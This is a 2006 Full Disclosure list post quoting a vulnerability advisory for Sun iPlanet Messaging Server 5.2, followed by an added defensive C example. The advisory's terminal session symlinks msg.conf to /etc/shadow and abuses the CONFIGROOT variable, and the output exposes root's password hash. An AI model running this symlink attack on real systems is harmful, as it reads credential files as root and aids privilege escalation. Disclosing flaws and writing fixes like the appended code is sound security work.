Full Disclosure mailing list archives
RE: [Fwd: Re: Sun iPlanet Messaging Server 5.2 root password compromise]
From: "php0t" <very () unprivate com>
Date: Sat, 17 Jun 2006 22:24:25 +0200
Excuse me, but what have I done to you? And why am I only supposed to disclose bugs when somebody pays me for it? Can you please explain your rant, so next time I can do -whatever- different?

And by the way, I'm not 'trying to prove I can find holes', I didn't spend any time trying to find a hole in this specific software, I just happened to stumble upon it in the process of trying to gain root - after which I decided to disclose this silly and obvious bug.

So I ask again, is this a problem for you? Am I being ignorant / evil for posting this vuln? Just tell me what's up - If your problem is that I do not get paid for this - well - I am happy that you are so much after what's best for me but I can do fine on my own - thanks.

php0t / zorro.hu

You are wasting your time trying to prove you can find holes in
software that you AREN'T *PAID FOR* FINDING BUGS.
Nice advisory, though. you spend time on it.
Sincerely, T.Solo
php0t wrote:

Summary
----------------
Date: 14 Jun 2006
Vendor: Sun Microsystems, Inc.
Name: iPlanet Messaging Server
Version: 5.2 HotFix 1.16 (built May 14 2003)
Vuln: msg.conf symlink attack
Severity: high

Software description
----------------
The iPlanet Messaging Server is a software product that provides a centralized location for the exchange of information through the sending and receiving of messages. The product is designed for telecommunications providers, service providers, and enterprises that offer messaging capabilities to employees, partners, and customers. The iPlanet Messaging Server delivers a Web-based messaging platform capable of serving tens of millions of users, and also provides value-added differentiated services, including outsourcing, wireless, and unified messaging services.

Vulnerability description
----------------
Setuid programs part of the iPlanet Messaging Server try to read the configuration file msg.conf. If the environment variable CONFIGROOT is set, the configuration is read from that directory. A symlink attack is possible, and as a result it is possible to read the first line of any file with uid=0.

Example
----------------
test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version
iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)
libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003)
SunOS sunbox 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris
test@sunbox:/tmp$
test@sunbox:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master
-rws--s--x 1 root mail 446864 Sep 22 2005 /iplanet/iMS5/bin/msg/imta/bin/pipe_master
test@sunbox:/tmp$
test@sunbox:/tmp$ ln -s /etc/shadow msg.conf
test@sunbox:/tmp$
test@sunbox:/tmp$ export CONFIGROOT=.
test@sunbox:/tmp$
test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master
[14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error: func=_configdrv_file_readoption; error=option name should be followed by '='; line=root:qW1HFEa1MCD0w:11821::::::
ERROR: Configuration database initialization failed - see default logfile
test@sunbox:/tmp$

Vulnerable
----------------
iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)

php0t / zorro.hu
www.zorro.hu

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
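
The check that the setuid programs in the quoted advisory lack, as an added defensive example (not code from the advisory or from Sun). CONFIGROOT and msg.conf come from the advisory; the function names config_root, open_trusted_config and selftest, and the temporary paths, are hypothetical and constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Honour CONFIGROOT only when the process is not running with elevated ids. */
const char *config_root(const char *builtin_default) {
    const char *env = getenv("CONFIGROOT");
    if (getuid() != geteuid() || getgid() != getegid())
        return builtin_default;        /* setuid/setgid: ignore caller's environment */
    return (env && *env) ? env : builtin_default;
}

/* Open dir/msg.conf without following a symlink, and accept it only if it is a
 * regular file owned by trusted_uid that group and other cannot write. */
int open_trusted_config(const char *dir, uid_t trusted_uid) {
    char path[4096];
    struct stat st;
    if (snprintf(path, sizeof path, "%s/msg.conf", dir) >= (int)sizeof path)
        return -1;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;             /* ELOOP when msg.conf is a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != trusted_uid || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed self-check: bit 0 = regular file accepted, bit 1 = symlink rejected. */
int selftest(void) {
    char good[] = "/tmp/cfgokXXXXXX", bad[] = "/tmp/cfglnXXXXXX", p[64], q[64];
    int r = 0, fd;
    if (!mkdtemp(good) || !mkdtemp(bad)) return -1;
    snprintf(p, sizeof p, "%s/msg.conf", good);
    snprintf(q, sizeof q, "%s/msg.conf", bad);
    fd = open(p, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || symlink(p, q) != 0) return -1;
    close(fd);
    if ((fd = open_trusted_config(good, geteuid())) >= 0) { r |= 1; close(fd); }
    if (open_trusted_config(bad, geteuid()) < 0) r |= 2;
    unlink(q); unlink(p); rmdir(bad); rmdir(good);
    return r;
}
int main(void) { printf("selftest=%d (3 = pass)\n", selftest()); return 0; }
```

O_NOFOLLOW covers only the final path component, so the directory itself must come from a trusted source, which is why config_root discards the environment when the ids differ. The disclosure in the advisory also relies on the error handler printing the rejected line; a privileged parser should report the line number rather than its content.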